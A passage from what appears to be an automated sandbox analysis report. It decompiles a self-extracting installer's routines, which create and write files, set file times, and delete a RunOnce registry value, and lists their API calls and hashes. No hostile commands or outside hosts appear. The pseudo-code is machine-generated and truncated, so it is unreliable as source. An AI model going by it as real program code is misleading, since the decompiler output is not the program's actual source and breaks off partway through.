                                                                                                                                                                                                                                            • LocalFree.KERNEL32(033C7140), ref: 008D530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(008D11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D5363
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008D5334
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 2833751637-305352358
                                                                                                                                                                                                                                            • Opcode ID: 396da8b0fe628d3d2bf51ba477a66b0612c2a6734662903fe8e2cc8c5ed02d23
                                                                                                                                                                                                                                            • Instruction ID: 6405d5de10c7065383af1bf5311fd430f70c17e19b27394ff9b66b951ab8f917
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 396da8b0fe628d3d2bf51ba477a66b0612c2a6734662903fe8e2cc8c5ed02d23
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C121C032912A24DBDB289F68EC09F6977B0FB11754F14035BE886D23A0CFB45C84CB82
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D1FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0x8d8530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,008D538C,?,?,008D538C), ref: 008D2005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(008D538C,wextract_cleanup0,?,?,008D538C), ref: 008D2017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008D538C,?,?,008D538C), ref: 008D2020
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                            • API String ID: 849931509-702805525
                                                                                                                                                                                                                                            • Opcode ID: 543f20e96a0a3234e444471c74109336c78b5c78a2f617f0bb1460dba0f79d29
                                                                                                                                                                                                                                            • Instruction ID: 0079ce43cac06581a68b13ab01a55cd993a7d96c217ba47e32812fb9902f2754
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 543f20e96a0a3234e444471c74109336c78b5c78a2f617f0bb1460dba0f79d29
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AE04F30551718FBD7258B91EC4AF5D7B39FB10740F200397B904E0260EB715E14D605
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E008D4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				long _t35;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				struct HWND__* _t37;
                                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				long _t44;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				long _t51;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                                                                                            				int _t75;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                            				_v8 = _t30;
                                                                                                                                                                                                                                            				_t75 = _a8;
                                                                                                                                                                                                                                            				if( *0x8d91d8 == 0) {
                                                                                                                                                                                                                                            					_t32 = _a4;
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                            						_t33 = E008D4E99(_t75);
                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                            						return E008D6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t35 = _t32 - 1;
                                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t36 = _t35 - 1;
                                                                                                                                                                                                                                            					__eflags = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                            						_t37 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t54 = 0x8d91e4;
                                                                                                                                                                                                                                            						_t58 = 0x8d91e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t38 =  *_t58;
                                                                                                                                                                                                                                            							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                                            						} while (_t38 != 0);
                                                                                                                                                                                                                                            						_t59 = _t58 - 0x8d91e5;
                                                                                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                                                                                            						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t39 =  *_t71;
                                                                                                                                                                                                                                            							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                                            						} while (_t39 != 0);
                                                                                                                                                                                                                                            						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                            						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                            							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x8d91e4;
                                                                                                                                                                                                                                            						_t30 = E008D4702( &_v268, 0x8d91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t41 = E008D476D( &_v268, __eflags);
                                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0x180);
                                                                                                                                                                                                                                            						_t30 = E008D4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                            						_t75 = _t30;
                                                                                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E008D47E0( &_v268);
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x8d93f4 =  *0x8d93f4 + 1;
                                                                                                                                                                                                                                            						_t33 = _t75;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t44 = _t36 - 1;
                                                                                                                                                                                                                                            					__eflags = _t44;
                                                                                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                                                                                            						_t54 = 0x8d91e4;
                                                                                                                                                                                                                                            						_t63 = 0x8d91e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t45 =  *_t63;
                                                                                                                                                                                                                                            							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                                            						} while (_t45 != 0);
                                                                                                                                                                                                                                            						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t64 = _t63 - 0x8d91e5;
                                                                                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                                                                                            						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t46 =  *_t74;
                                                                                                                                                                                                                                            							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                                            						} while (_t46 != 0);
                                                                                                                                                                                                                                            						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                            						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x8d91e4;
                                                                                                                                                                                                                                            						_t30 = E008D4702( &_v268, 0x8d91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                            						_t30 = E008D4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						E008D4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E008D4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}
































                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 008D4DB5
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 008D4DDD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 3625706803-305352358
                                                                                                                                                                                                                                            • Opcode ID: 75daaa19929abe0cbec111a6e429343e10f08fff68066c3550f5853ae568fb5c
                                                                                                                                                                                                                                            • Instruction ID: 9a7edde010f04127e343fddc0770135069190f0b1b94c70b07f33c3c8a3fe785
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75daaa19929abe0cbec111a6e429343e10f08fff68066c3550f5853ae568fb5c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 394111362001059BCF359F28DD44AB973A6FB45314F14576BE8C6D7386DA32DE4AC750
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0x8d8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0x8d8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32 ref: 008D4C54
                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008D4C66
                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 008D4C7E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                            • Opcode ID: 8732b2a278f6a599cedd08a5bb02498fa01feeb7d66c20846006766903fcba44
                                                                                                                                                                                                                                            • Instruction ID: b92c4cd3f2cb93ecb181f5550861241ee9b1395fdc3772903f508406a3d5a5dd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8732b2a278f6a599cedd08a5bb02498fa01feeb7d66c20846006766903fcba44
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75F0907261220DAF9F24DFB4CC49DBB77ADFB04250B44072BA816C2190FA34D914C7A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E008D487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E008D490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,008D4A23,?,008D4F67,*MEMCAB,00008000,00000180), ref: 008D48DE
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,008D4F67,*MEMCAB,00008000,00000180), ref: 008D4902
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: d1f1d9ec7056805abc54dcde3a5b05086011a90bcacae83546a2b88193ccee0e
                                                                                                                                                                                                                                            • Instruction ID: f5bd51b0feba87a50f6cb53b8c0d719664b811e4f7f834ce330e12d46cddda80
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1f1d9ec7056805abc54dcde3a5b05086011a90bcacae83546a2b88193ccee0e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF014BA3E125742BF32440298C88FB7571CEB96775F2B1336BDEAE72D2D6644C0491E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E008D4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 =  *0x8d858c; // 0x270
                                                                                                                                                                                                                                            				_t9 = E008D3680(_t20);
                                                                                                                                                                                                                                            				if( *0x8d91d8 == 0) {
                                                                                                                                                                                                                                            					_push(_t24);
                                                                                                                                                                                                                                            					_t12 = WriteFile( *(0x8d8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t25 = _a12;
                                                                                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            							_t14 =  *0x8d9400; // 0xd0200
                                                                                                                                                                                                                                            							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                            							 *0x8d9400 = _t15;
                                                                                                                                                                                                                                            							if( *0x8d8184 != 0) {
                                                                                                                                                                                                                                            								_t21 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x8d93f8, 0);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 008D369F
                                                                                                                                                                                                                                              • Part of subcall function 008D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008D36B2
                                                                                                                                                                                                                                              • Part of subcall function 008D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008D36DA
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 008D4B05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                            • Opcode ID: 4bbe02f0e496915be42dfeeb9a5814406886bbf427458d0fc424bde66a8e4210
                                                                                                                                                                                                                                            • Instruction ID: 4574dfa965ebd958a9609ad4138b8812263f8e37b8bdcb3aa86149601b8412bd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bbe02f0e496915be42dfeeb9a5814406886bbf427458d0fc424bde66a8e4210
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F016931201205ABDB148FA8EC05FA67769FB58735F149327E939D72E0CB70D811CB80
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                            				char* _t6;
                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				char* _t16;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				char* _t19;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t17 + 1; // 0x8d8b3f
                                                                                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t4 =  *_t17;
                                                                                                                                                                                                                                            					_t17 = _t17 + 1;
                                                                                                                                                                                                                                            				} while (_t4 != 0);
